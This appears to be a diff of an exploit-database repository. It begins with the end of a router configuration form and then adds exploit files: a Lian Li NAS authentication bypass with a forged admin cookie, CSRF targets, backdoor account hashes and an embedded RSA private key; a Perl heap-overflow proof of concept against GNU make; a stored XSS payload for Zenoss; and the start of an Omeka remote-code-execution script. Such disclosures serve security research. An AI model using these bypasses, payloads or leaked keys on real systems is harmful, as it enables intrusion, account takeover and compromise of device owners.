<td><img src="spacer.gif" width="20" height="12" border="0">Primary DNS</td>
<td align="right" class="num">
<input type="text" name="DAddr1" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="DAddr2" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="DAddr3" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="DAddr4" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td><img src="spacer.gif" width="20" height="12" border="0"><a href="javascript:loadhelp('BAS_mpppoe','DNSaddress')" tabindex="-1">Secondary DNS</a></td>
<td align="right" class="num">
<input type="text" name="PDAddr1" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="PDAddr2" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="PDAddr3" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="PDAddr4" class="num" size="4" maxlength="3" onFocus="if(DisableFixedDNS) this.blur()" onChange="setCfgChanged()"></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2"><a href="javascript:loadhelp('BAS_mpppoe','nat')" tabindex="-1"><b>NAT (Network Address Translation) </b></a></td>
</tr>
<tr>
<td> </td>
<td align="right">
<input type="radio" name="nat_enable" value="1" onChange="setCfgChanged()"> Enable
<input type="radio" name="nat_enable" value="0" onChange="setCfgChanged()"> Disable
<input type="radio" name="nat_enable" value="2" onChange="setCfgChanged()"> Bridge
</td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2" align="center"><div ID="pppoebuttons" onmouseover="loadhelp('BAS_mpppoe','buttons')">
<input type="SUBMIT" name="apply" value="Apply" onClick="return checkData()">
<input type="BUTTON" name="Cancel" value="Cancel" onClick="resetPvc();">
<input type="BUTTON" name="Test" value="Test" onClick="checkTest();">
</div></td></tr>
</table>
<INPUT name=gui_mode type=hidden value= "1">
<INPUT name=nowchoice type=hidden value= "0">
<INPUT name=pppoe_localip type=hidden value= "">
<INPUT name=wan_dns_sel type=hidden value= "">
<INPUT name=wan_dns1_pri type=hidden value= "">
<INPUT name=wan_dns1_sec type=hidden value= "">
<INPUT name=atm0_vpi type=hidden value= "8">
<INPUT name=atm0_vci type=hidden value= "48">
<INPUT name=atm0_multiplex type=hidden value= "llcencaps">
<INPUT name=atm0_encap type=hidden value= "LLC">
<INPUT name=atm1_vpi type=hidden value= "0">
<INPUT name=atm1_vci type=hidden value= "32">
<INPUT name=atm1_multiplex type=hidden value= "llcencaps">
<INPUT name=atm1_encap type=hidden value= "LLC">
<INPUT name=atm2_vpi type=hidden value= "0">
<INPUT name=atm2_vci type=hidden value= "33">
<INPUT name=atm2_multiplex type=hidden value= "llcencaps">
<INPUT name=atm2_encap type=hidden value= "LLC">
<INPUT name=atm3_vpi type=hidden value= "0">
<INPUT name=atm3_vci type=hidden value= "34">
<INPUT name=atm3_multiplex type=hidden value= "llcencaps">
<INPUT name=atm3_encap type=hidden value= "LLC">
<INPUT name=atm4_vpi type=hidden value= "0">
<INPUT name=atm4_vci type=hidden value= "35">
<INPUT name=atm4_multiplex type=hidden value= "llcencaps">
<INPUT name=atm4_encap type=hidden value= "LLC">
<INPUT name=atm5_vpi type=hidden value= "0">
<INPUT name=atm5_vci type=hidden value= "36">
<INPUT name=atm5_multiplex type=hidden value= "llcencaps">
<INPUT name=atm5_encap type=hidden value= "LLC">
<INPUT name=atm6_vpi type=hidden value= "0">
<INPUT name=atm6_vci type=hidden value= "37">
<INPUT name=atm6_multiplex type=hidden value= "llcencaps">
<INPUT name=atm6_encap type=hidden value= "LLC">
<INPUT name=atm7_vpi type=hidden value= "0">
<INPUT name=atm7_vci type=hidden value= "38">
<INPUT name=atm7_multiplex type=hidden value= "llcencaps">
<INPUT name=atm7_encap type=hidden value= "LLC">
<input type="hidden" name="cfgChanged" value="0">
<input type="hidden" name="testpressed" value="0">
<input type="hidden" name="runtest" value="no">
<INPUT name=wan0_dial type=hidden value= "1">
<INPUT name=wan1_dial type=hidden value= "0">
<INPUT name=wan2_dial type=hidden value= "0">
<INPUT name=wan3_dial type=hidden value= "0">
<INPUT name=wan4_dial type=hidden value= "0">
<INPUT name=wan5_dial type=hidden value= "0">
<INPUT name=wan6_dial type=hidden value= "0">
<INPUT name=wan7_dial type=hidden value= "0">
</form>
<p></p>
</body>
</html>

327
platforms/hardware/webapps/34163.txt Executable file
View file

@ -0,0 +1,327 @@
# Exploit Title: Lian Li NAS Multiple vulnerabilities
# Date: 21/07/2014
# Exploit Author: pws
# Vendor Homepage: http://www.lian-li.com/en/dt_portfolio_category/nas/
# Firmware Link: https://www.dropbox.com/s/imvkndl8m5yj7qp/G5S604121826700.tar.gz
# Tested on: Latest version
# CVE : None yet
1. Hardcoded cookie to access the admin section
File: /javascript/storlib.js
function get_cookie()
{
var allcookies = document.cookie;
var pos = allcookies.indexOf("LoginUser=admin");
if (pos == -1)
location = "/index.html";
}
2. Authentication bypass
Create such cookie: 'LoginUser=admin' (document.cookie='LoginUser=admin').
Then, access the URL directly to get admin features.
Eg.
http://192.168.1.1/cgi/telnet/telnet.cgi # enable/disable the Telnet server
http://192.168.1.1/cgi/user/user.cgi # manage users (change passwords, add user, ...)
Here are all the cgi's accessible (firmware: G5S604121826700) :
cgi/lan/lan.cgi
cgi/lan/lan_nasHandler.cgi
cgi/lan/lan_routerHandler.cgi
cgi/information/information.cgi
cgi/return/return.cgi
cgi/account/account.cgi
cgi/account/accountHandler.cgi
cgi/lang/lang.cgi
cgi/lang/langHandler.cgi
cgi/backup/clear.cgi
cgi/backup/fixed.cgi
cgi/backup/ipaddress.cgi
cgi/backup/listing.cgi
cgi/backup/s.cgi
cgi/backup/schedule.cgi
cgi/backup/source.cgi
cgi/backup/dd_schedule.cgi
cgi/backup/decide.cgi
cgi/backup/ipaddress1.cgi
cgi/backup/s1.cgi
cgi/backup/source1.cgi
cgi/backup/ipaddress2.cgi
cgi/backup/s2.cgi
cgi/backup/source2.cgi
cgi/backup/ipaddress3.cgi
cgi/backup/s3.cgi
cgi/backup/source3.cgi
cgi/backup/ipaddress5.cgi
cgi/backup/s5.cgi
cgi/backup/source5.cgi
cgi/backup/l.cgi
cgi/backup/listing1.cgi
cgi/backup/listing2.cgi
cgi/backup/listing3.cgi
cgi/backup/listing5.cgi
cgi/backup/email.cgi
cgi/backup/email1.cgi
cgi/backup/fixed1.cgi
cgi/backup/schedule1.cgi
cgi/backup/email2.cgi
cgi/backup/fixed2.cgi
cgi/backup/schedule2.cgi
cgi/backup/email3.cgi
cgi/backup/fixed3.cgi
cgi/backup/schedule3.cgi
cgi/backup/dd_schedule1.cgi
cgi/backup/dd_schedule2.cgi
cgi/backup/dd_schedule3.cgi
cgi/backup/dd_schedule5.cgi
cgi/backup/email5.cgi
cgi/backup/fixed5.cgi
cgi/backup/schedule5.cgi
cgi/backup/fixed6.cgi
cgi/backup/ipaddress6.cgi
cgi/backup/listing6.cgi
cgi/backup/s6.cgi
cgi/backup/email6.cgi
cgi/backup/schedule6.cgi
cgi/backup/source6.cgi
cgi/backup/dd_schedule6.cgi
cgi/backup/fixed4.cgi
cgi/backup/ipaddress4.cgi
cgi/backup/listing4.cgi
cgi/backup/s4.cgi
cgi/backup/email4.cgi
cgi/backup/schedule4.cgi
cgi/backup/source4.cgi
cgi/backup/dd_schedule4.cgi
cgi/backup/emessage.cgi
cgi/backup/emessage_fail.cgi
cgi/group/group.cgi
cgi/group/groupHandler.cgi
cgi/group/groupDeleteHandler.cgi
cgi/group/groupMembers.cgi
cgi/group/groupMembersHandler.cgi
cgi/user/user.cgi
cgi/user/userHandler.cgi
cgi/user/userDeleteHandler.cgi
cgi/user/userMembership.cgi
cgi/user/userMembershipHandler.cgi
cgi/time/time.cgi
cgi/time/timeHandler.cgi
cgi/power/power.cgi
cgi/power/powerHandler.cgi
cgi/factoryReset/factoryReset.cgi
cgi/factoryReset/factoryResetHandler.cgi
cgi/restoreConfig/restoreConfig.cgi
cgi/restoreConfig/restoreConfigHandler.cgi
cgi/saveConfig/saveConfig.cgi
cgi/saveConfig/saveConfigHandler.cgi
cgi/diskUsage/diskUsage.cgi
cgi/diskUsage/diskUsageuser.cgi
cgi/diskUsage/diskUsageHandler.cgi
cgi/diskUsage/diskUsageuserHandler.cgi
cgi/diskUtility/diskUtility.cgi
cgi/diskUtility/diskUtilityHandler.cgi
cgi/diskUtility/healthReport.cgi
cgi/dhcpserver/dhcpserver.cgi
cgi/dhcpserver/dhcpserverHandler.cgi
cgi/dhcpserver/dhcplease.cgi
cgi/dhcpserver/dhcpleaseHandler.cgi
cgi/dhcpserver/dhcpstatic.cgi
cgi/dhcpserver/dhcpstaticHandler.cgi
cgi/dhcpserver/staticipDeleteHandler.cgi
cgi/errorAlert/errorAlert.cgi
cgi/errorAlert/errorAlertHandler.cgi
cgi/share/share.cgi
cgi/share/shareHandler.cgi
cgi/share/shareDeleteHandler.cgi
cgi/share/share_nonLinux.cgi
cgi/share/share_nonLinuxHandler.cgi
cgi/share/share_Linux.cgi
cgi/share/share_LinuxHandler.cgi
cgi/fileServer/fileServer.cgi
cgi/fileServer/fileServerHandler.cgi
cgi/log_system/log_system.cgi
cgi/log_system/log_systemHandler.cgi
cgi/log_admin/log_admin.cgi
cgi/log_admin/log_adminHandler.cgi
cgi/log_dhcp/log_dhcp.cgi
cgi/log_dhcp/log_dhcpHandler.cgi
cgi/log_ftp/log_ftp.cgi
cgi/log_ftp/log_ftpHandler.cgi
cgi/log_samba/log_samba.cgi
cgi/log_samba/log_sambaHandler.cgi
cgi/printer/printer.cgi
cgi/printer/printerHandler.cgi
cgi/upgrade2/upgrade.cgi
cgi/upgrade2/upgradeHandler.cgi
cgi/wizard/wizard.cgi
cgi/wizard/language.cgi
cgi/wizard/languageHandler.cgi
cgi/wizard/password.cgi
cgi/wizard/passwordHandler.cgi
cgi/wizard/hostname.cgi
cgi/wizard/hostnameHandler.cgi
cgi/wizard/tcpip.cgi
cgi/wizard/tcpipHandler.cgi
cgi/wizard/time.cgi
cgi/wizard/timeHandler.cgi
cgi/wizard/confirm.cgi
cgi/wizard/confirmHandler.cgi
cgi/wizard/addUser.cgi
cgi/wizard/user.cgi
cgi/wizard/userHandler.cgi
cgi/wizard/userMembership.cgi
cgi/wizard/userMembershipHandler.cgi
cgi/wizard/userSharePermission.cgi
cgi/wizard/userSharePermissionHandler.cgi
cgi/wizard/addGroup.cgi
cgi/wizard/group.cgi
cgi/wizard/groupHandler.cgi
cgi/wizard/groupMembers.cgi
cgi/wizard/groupMembersHandler.cgi
cgi/wizard/groupSharePermission.cgi
cgi/wizard/groupSharePermissionHandler.cgi
cgi/wizard/addShare.cgi
cgi/wizard/share.cgi
cgi/wizard/shareHandler.cgi
cgi/wizard/sharePermission.cgi
cgi/wizard/sharePermissionHandler.cgi
cgi/wizard/nfsPermission.cgi
cgi/wizard/nfsPermissionHandler.cgi
cgi/wizard/button.cgi
cgi/telnet/telnet.cgi
cgi/telnet/telnetHandler.cgi
cgi/bonjour/bonjour.cgi
cgi/bonjour/bonjourHandler.cgi
cgi/raid/raid.cgi
cgi/raid/raidHandler.cgi
cgi/swupdate/swupdate.cgi
cgi/swupdate/swupdateHandler.cgi
cgi/swupdate/installHandler.cgi
cgi/swupdate/swlist.cgi
cgi/swupdate/swlistHandler.cgi
All forms on those cgi pages can be used to perform CSRF attacks (to target internal network for example).
3. Backdoored accounts
Some users are not referenced in the management page but are present in the system.
Moreover, the robustness of such passwords is really poor (password = "123456"):
mysql:$1$$RmyPVMlhpXjJj8iv4w.Ul.:6000:6000:Linux User,,,:/home/mysql:/bin/sh
daemon:$1$$RmyPVMlhpXjJj8iv4w.Ul.:7000:7000:Linux User,,,:/home/daemon:/bin/sh
4. Privilege escalation "scenario"
Enable Telnet server (if disabled)
Connect to it using one of the backdoored accounts and retrieve /etc/passwd file.
It contains passwords for all accounts.
5. Certificate used by the FTP server stored in the firmware
cacert.pem
subject=/C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server
issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA
-----BEGIN X509 CERTIFICATE-----
MIIBgjCCASwCAQQwDQYJKoZIhvcNAQEEBQAwODELMAkGA1UEBhMCQVUxDDAKBgNV
BAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3JzYSB0ZXN0IENBMB4XDTk1MTAwOTIz
MzIwNVoXDTk4MDcwNTIzMzIwNVowYDELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FM
RDEZMBcGA1UEChMQTWluY29tIFB0eS4gTHRkLjELMAkGA1UECxMCQ1MxGzAZBgNV
BAMTElNTTGVheSBkZW1vIHNlcnZlcjBcMA0GCSqGSIb3DQEBAQUAA0sAMEgCQQC3
LCXcScWua0PFLkHBLm2VejqpA1F4RQ8q0VjRiPafjx/Z/aWH3ipdMVvuJGa/wFXb
/nDFLDlfWp+oCPwhBtVPAgMBAAEwDQYJKoZIhvcNAQEEBQADQQArNFsihWIjBzb0
DCsU0BvL2bvSwJrPEqFlkDq3F4M6EGutL9axEcANWgbbEdAvNJD1dmEmoWny27Pn
IMs6ZOZB
-----END X509 CERTIFICATE-----
server-cert.pem
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=TW, ST=Taipei, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com
Validity
Not Before: Jan 3 00:46:50 2007 GMT
Not After : Jan 3 00:46:50 2008 GMT
Subject: C=TW, ST=Taipei, L=Hsinchu, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:c4:1d:89:dc:9b:45:6c:96:e2:ad:e6:98:13:25:
64:b4:54:f6:e4:97:74:d5:9f:15:1e:1d:45:a1:75:
45:fc:3b:2b:9c:dd:e6:0d:34:4b:d7:6c:8d:d0:32:
5f:39:25:ab:53:81:de:84:17:cf:27:0a:c2:26:82:
9f:09:3f:a8:7e:8c:31:c3:fe:43:75:fe:1f:53:8e:
74:0e:31:d2:55:71:51:1b:7a:01:e3:57:4f:f7:d6:
9f:1d:39:19:42:3c:a1:bd:08:d1:99:69:fc:1c:34:
6e:0f:fb:a7:36:f5:77:bf:95:c8:1d:50:30:25:59:
23:39:d3:27:5a:06:0a:05:6d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
61:19:1F:04:38:83:83:E0:CD:6A:8C:CA:F9:9C:6E:D3:7F:C5:55:C3
X509v3 Authority Key Identifier:
keyid:F6:E9:49:A1:24:01:C1:0A:4C:7F:6A:E7:58:B8:95:BC:AF:95:B4:F7
DirName:/C=TW/ST=Taipei/O=Storm/OU=software/CN=aaron/emailAddress=aaron@storlinksemi.com
serial:00
Signature Algorithm: sha1WithRSAEncryption
5b:b7:dc:28:58:5e:53:c5:d7:88:be:71:21:43:b5:db:a1:d7:
fc:de:38:1d:38:e7:b3:a4:a5:64:92:1b:67:1b:c8:3e:0f:a9:
16:77:0c:0b:bf:e9:d2:b5:70:cd:05:71:df:1a:db:2a:c8:56:
5d:91:1c:ef:2b:16:b3:f0:55:89:ba:35:e4:ae:07:6c:4a:c5:
d0:0d:e3:1b:1d:5e:fd:01:b2:52:0e:fe:05:08:ed:40:26:e6:
b0:2b:24:2f:0d:42:11:f0:d9:b4:6d:db:ce:d1:b1:65:77:62:
7a:06:8b:09:c7:33:f3:43:13:a7:33:47:af:5c:6a:39:4e:8f:
64:5c
-----BEGIN CERTIFICATE-----
MIIDezCCAuSgAwIBAgIBATANBgkqhkiG9w0BAQUFADB4MQswCQYDVQQGEwJUVzEP
MA0GA1UECBMGVGFpcGVpMQ4wDAYDVQQKEwVTdG9ybTERMA8GA1UECxMIc29mdHdh
cmUxDjAMBgNVBAMTBWFhcm9uMSUwIwYJKoZIhvcNAQkBFhZhYXJvbkBzdG9ybGlu
a3NlbWkuY29tMB4XDTA3MDEwMzAwNDY1MFoXDTA4MDEwMzAwNDY1MFowgYoxCzAJ
BgNVBAYTAlRXMQ8wDQYDVQQIEwZUYWlwZWkxEDAOBgNVBAcTB0hzaW5jaHUxDjAM
BgNVBAoTBVN0b3JtMREwDwYDVQQLEwhzb2Z0d2FyZTEOMAwGA1UEAxMFYWFyb24x
JTAjBgkqhkiG9w0BCQEWFmFhcm9uQHN0b3JsaW5rc2VtaS5jb20wgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAMQdidybRWyW4q3mmBMlZLRU9uSXdNWfFR4dRaF1
Rfw7K5zd5g00S9dsjdAyXzklq1OB3oQXzycKwiaCnwk/qH6MMcP+Q3X+H1OOdA4x
0lVxURt6AeNXT/fWnx05GUI8ob0I0Zlp/Bw0bg/7pzb1d7+VyB1QMCVZIznTJ1oG
CgVtAgMBAAGjggEAMIH9MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5T
U0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQWBBRhGR8EOIOD4M1qjMr5
nG7Tf8VVwzCBogYDVR0jBIGaMIGXgBT26UmhJAHBCkx/audYuJW8r5W096F8pHow
eDELMAkGA1UEBhMCVFcxDzANBgNVBAgTBlRhaXBlaTEOMAwGA1UEChMFU3Rvcm0x
ETAPBgNVBAsTCHNvZnR3YXJlMQ4wDAYDVQQDEwVhYXJvbjElMCMGCSqGSIb3DQEJ
ARYWYWFyb25Ac3RvcmxpbmtzZW1pLmNvbYIBADANBgkqhkiG9w0BAQUFAAOBgQBb
t9woWF5TxdeIvnEhQ7Xbodf83jgdOOezpKVkkhtnG8g+D6kWdwwLv+nStXDNBXHf
GtsqyFZdkRzvKxaz8FWJujXkrgdsSsXQDeMbHV79AbJSDv4FCO1AJuawKyQvDUIR
8Nm0bdvO0bFld2J6BosJxzPzQxOnM0evXGo5To9kXA==
-----END CERTIFICATE-----
server-key.pem
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDEHYncm0VsluKt5pgTJWS0VPbkl3TVnxUeHUWhdUX8Oyuc3eYN
NEvXbI3QMl85JatTgd6EF88nCsImgp8JP6h+jDHD/kN1/h9TjnQOMdJVcVEbegHj
V0/31p8dORlCPKG9CNGZafwcNG4P+6c29Xe/lcgdUDAlWSM50ydaBgoFbQIDAQAB
AoGBAIKcZZd99aOXbcqBm+CMc+BCAdhGInKvK0JOHnSkhQKyaZ5kjnVW0ffb/Sqe
kZqewtav1IFG1hjbamh5b++Z7N2F+jshPnacdBXrgT4PPUfj3+ZirXlyckxJv3YT
Ql1bLsaCMne2b4sUuGsldROfiXfOR5SDUhbHocQj+mj8C/OlAkEA/4TfMZJqIkAx
W7uwPqX7c6k1XhLwC5tjEkyZA3jhgLMCDzw1RGxO65haVyKm//e4f1S7ctQ/v80j
Rret0A4cnwJBAMR8CqOpKI7W4Qao2aIYmL36a9VIFWoNunlmuSUW/KiBkAGhfGBn
+VG0uueM4PdOWl0i45SyZxTiYUjxE+BSlnMCQQDp611dB3osYvIM1dVydQevCgA2
YEXrilR3YzJNkHN5G+fNxMPLIRBa9H33+VxDRyhbQVndtNurnoQl8G+p4dFnAkA5
Ftl4iBPyvNiROMpTYNYwjOx8Af/G2spNr90nu7AZvdt7vdIHqO42IU8VLEfJU4jJ
+vMpJ1TwKn6d1P4zdYulAkB1FPvPcRmn1P69b2tDGEeoSNbh4s7eqV7AntDGeQhp
ppiLtY+nlj+Mjs2pHLa1bRAWcQRl/GYU4rdF6Py9F/w/
-----END RSA PRIVATE KEY-----

182
platforms/linux/dos/34164.pl Executable file
View file

@ -0,0 +1,182 @@
=for comment
# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64
# Date: [14.07.14]
# Exploit Author: HyP
# Vendor Homepage: http://www.gnu.org/software/make/
# Software Link: http://ftp.gnu.org/gnu/make/
# Version: Make 3.81
# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)
# CVE : none
*******************************************************************************************
Special Thanks:
kmkz
Zadyree
Sec0d Team
*******************************************************************************************
*******************************************************************************************
32bits
./checksec.sh --file make
RELRO STACK CANARY NX PIE RPATH
RUNPATH FILE
No RELRO No canary found NX enabled No PIE No RPATH
No RUNPATH make
gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
EAX: 0xdeadbeef
EBX: 0x807b971 --> 0x6f2e ('.o')
ECX: 0x0
EDX: 0x1
ESI: 0xdeadbeef
EDI: 0x0
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x80548aa: je 0x80548b8
0x80548ac: lea esi,[esi+eiz*1+0x0]
0x80548b0: mov esi,eax
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing
0x80548b4: test eax,eax
0x80548b6: jne 0x80548b0
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')
0008| 0xbfffa318 --> 0x2
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")
0016| 0xbfffa320 --> 0x0
0020| 0xbfffa324 --> 0x0
0024| 0xbfffa328 --> 0x0
0028| 0xbfffa32c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080548b2 in ?? ()
Overflow code:
...
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80548b0: 89 c6 mov %eax,%esi
80548b2: 8b 00 mov (%eax),%eax
80548b4: 85 c0 test %eax,%eax
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>
...
gdb-peda$ x/x $eax
0x807ff68: 0x00000000
peda vmmap
Start End Perm Name
0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make
0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make
0x08070000 0x08092000 rw-p [heap] // heap overflow !!
*******************************************************************************************
*******************************************************************************************
64bits
Overflow Code :
40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>
40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
40cc60: 48 89 c3 mov rbx,rax
40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xdeadbeefdeadbeef
RBX: 0xdeadbeefdeadbeef
RCX: 0x4242424242424242 ('BBBBBBBB')
RDX: 0x0
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')
RBP: 0x7fffffffb930 --> 0x1
RSP: 0x7fffffff95f0 --> 0x0
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])
R8 : 0x4242424242424242 ('BBBBBBBB')
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])
R10: 0x4242424242424242 ('BBBBBBBB')
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708
R12: 0x1
R13: 0x0
R14: 0x6397a0 --> 0x6f2e25 ('%.o')
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x40cc59: je 0x40cc6b
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]
0x40cc60: mov rbx,rax
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing
0x40cc66: test rax,rax
0x40cc69: jne 0x40cc60
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1
0x40cc72: lea rdi,[rbp-0x40]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff95f0 --> 0x0
0008| 0x7fffffff95f8 --> 0x0
0016| 0x7fffffff9600 --> 0x0
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->
0x5f7266006362696c ('libc')
0032| 0x7fffffff9610 --> 0xffffffdf
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541
--> 0x5f726600656b616d ('make')
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->
0x64667b --> 0x5f7266006362696c ('libc')
0056| 0x7fffffff9628 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040cc63 in ?? ()
*******************************************************************************************
*******************************************************************************************
Proof of Concept - Source code
*******************************************************************************************
*******************************************************************************************
=cut
#!/usr/bin/perl
use 5.010;
use strict;
use warnings;
say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
sleep 0.5;
my $buff = "A"x 4096 ;
my $addr = "\xef\xbe\xad\xde";
my $make = "./make";
my $gdb = "gdb --core core";
my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);
my $exec= qx($make $PAYLOAD);
say " Reading Core file GDB ";
sleep 0.5;
system ($gdb);

92
platforms/multiple/webapps/34165.txt Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: Stored XSS vulnerability in Zenoss core open source
monitoring system
# Date: 12/05/2014
# Exploit author: Dolev Farhi dolev(at)openflare.org
# Vendor homepage: http://zenoss.com
# Software Link: http://www.zenoss.com
# Version: Core 4.2.5-2108 64bit
# Tested on: Kali Linux
# Vendor alerted: 12/05/2014
# CVE-2014-3738
Software details:
==================
Zenoss (Zenoss Core) is a free and open-source application, server, and
network management platform based on the Zope application server.
Released under the GNU General Public License (GPL) version 2, Zenoss
Core provides a web interface that
allows system administrators to monitor availability,
inventory/configuration, performance, and events.
Vulnerability details: Stored XSS Vulnerability
========================
A persistent XSS vulnerability was found in Zenoss core, by creating a
malicious host with the Title <script>alert("Xss")</script> any user
browsing
to the relevant manufacturers page will get a client-side script
executed immediately.
Proof of Concept:
1. Create a device with with the Title
<script>alert("XSS")</script>
2. Navigate to the Infrastructure -> Manufacturers
page.
3. pick the name of the manufacturer of the device, e.g.
Intel
4. select the type of the hardware the device is
assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz
5. the XSS Executes.
<tr class="even">
<td class="tablevalues"><a
href='/zport/dmd/Devices/Server/Linux/devices/localhost/devicedetail'><script>alert("Dolev")</script></a></td>
<td class="tablevalues">GenuineIntel_ Intel(R) Core(TM)
i7-2640M CPU _ 2.80GHz</td>
</tr>

293
platforms/php/remote/34160.txt Executable file
View file

@ -0,0 +1,293 @@
#!/usr/bin/env python
#
#
# Omeka 2.2.1 Remote Code Execution Exploit
#
#
# Vendor: Omeka Team (CHNM GMU)
# Product web page: http://www.omeka.org
# Affected version: 2.2.1 and 2.2
#
# Summary: Omeka is a free, flexible, and open source web-publishing
# platform for the display of library, museum, archives, and scholarly
# collections and exhibitions. Its 'five-minute setup' makes launching
# an online exhibition as easy as launching a blog.
#
# Desc: Omeka suffers from an authenticated arbitrary PHP code execution.
# The vulnerability is caused due to the improper verification of
# uploaded files in '/admin/items/add' script thru the 'file[0]' POST
# parameter. This can be exploited to execute arbitrary PHP code by
# uploading a malicious PHP script file that will be stored in
# '/files/original' directory after successfully disabling the file
# validation option (or adding something like 'application/x-php' into the
# allowed MIME types list) and bypassing the rewrite rule in the '.htaccess'
# file with '.php5' extension.
#
# .htaccess fix by vendor:
# -------------------------------------------------------
# Line 29: -RewriteRule !\.php$ - [C]
# Line 29: +RewriteRule !\.(php[0-9]?|phtml|phps)$ - [C]
# -------------------------------------------------------
#
# - Role permission for disabling validation and uploading files: Super
# - Role permission for uploading files: Super, Admin
#
# Ref: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
#
# Tested on: Kali Linux 3.7-trunk-686-pae
# Apache/2.2.22 (Debian)
# PHP 5.4.4-13(apache2handler)
# MySQL 5.5.28
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5194
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5194.php
#
#
# 16.07.2014
#
#
version = '2.0.0.251'
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
init()
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
